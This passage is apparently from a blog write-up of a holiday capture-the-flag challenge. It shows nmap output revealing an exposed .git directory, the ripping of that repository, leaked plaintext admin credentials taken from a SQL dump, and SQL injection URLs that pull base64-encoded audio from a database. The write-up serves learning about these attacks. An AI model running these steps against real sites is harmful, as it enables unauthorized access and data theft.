|   104.198.252.157:443/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Finishing touches (style, css, etc)
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php
| ssl-cert: Subject: commonName=analytics.northpolewonderland.com
| Subject Alternative Name: DNS:analytics.northpolewonderland.com
| Not valid before: 2016-12-07T17:35:00
|_Not valid after:  2017-03-07T17:35:00
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_  http/1.1
</code></pre>

<p>Downloading the git repository gives a corrupted instance of the code base. After using this <a href="https://github.com/kost/dvcs-ripper">tool</a>, I was able to get the source code. Looking through the git log I noticed mention of authentication updates. </p>

<pre><code class="language-bash">./rip-git.pl -s -v -u https://analytics.northpolewonderland.com/.git/
git log  
git checkout 5f0c135e1479d865945577c0a70d0cf39e49cdc7  
</code></pre>

<p>Checking out <code>5f0c135e1479d865945577c0a70d0cf39e49cdc7</code> provides administrator credentials that are still valid in <code>sprusage.sql</code>.</p>

<pre><code class="language-sql">INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');  
</code></pre>

<p>After logging in with the administrator credentials we see that we now can perform edits. Performing a blank query for usage gives us a UUID that we can attempt to edit.</p>

<p><amp-img src="http://blog.elauqsap.com/content/images/2017/01/spru-query-2.jpeg" alt width="2176" height="372" layout="responsive"></amp-img></p>

<p>It seems to be looping for the submitted parameters and building a SQL query. So can we just submit the query parameter in the URL with some arbitrary query?</p>

<pre><code class="language-language bash">https://analytics.northpolewonderland.com/edit.php?id=9dbdf565-ebf7-4e9d-a12a-9b165ff3d818&amp;name=the&amp;description=donald&amp;query=select%20*%20from%20audio  
</code></pre>

<p><amp-img src="http://blog.elauqsap.com/content/images/2017/01/spru-sqli.jpeg" alt width="2272" height="410" layout="responsive"></amp-img>
<amp-img src="http://blog.elauqsap.com/content/images/2017/01/squ-proof.jpeg" alt width="2298" height="786" layout="responsive"></amp-img></p>

<p>The column <code>mp3</code> isn't showing and appears to be blob data from the schema discovered in the git repository. Modifying the query to use <code>to_base64()</code> on <code>mp3</code> allows for extraction of the audio file.</p>

<pre><code class="language-bash">https://analytics.northpolewonderland.com/edit.php?id=9dbdf565-ebf7-4e9d-a12a-9b165ff3d818&amp;name=the&amp;description=donald&amp;query=select%20filename,to_base64(mp3)%20from%20audio  
</code></pre>

<p>Use <code>| base64 --decode &gt; discombobulatedaudio7.mp3</code> to decode the text and get the audio file.</p>

            </section>

        </article>
    </main>
    <footer class="site-footer clearfix">
        <section class="copyright"><a href="../../index.html">thought|pipe</a> &copy; 2017</section>
        <section class="poweredby">Proudly published with <a href="https://ghost.org">Ghost</a></section>
    </footer>
</body>
</html>
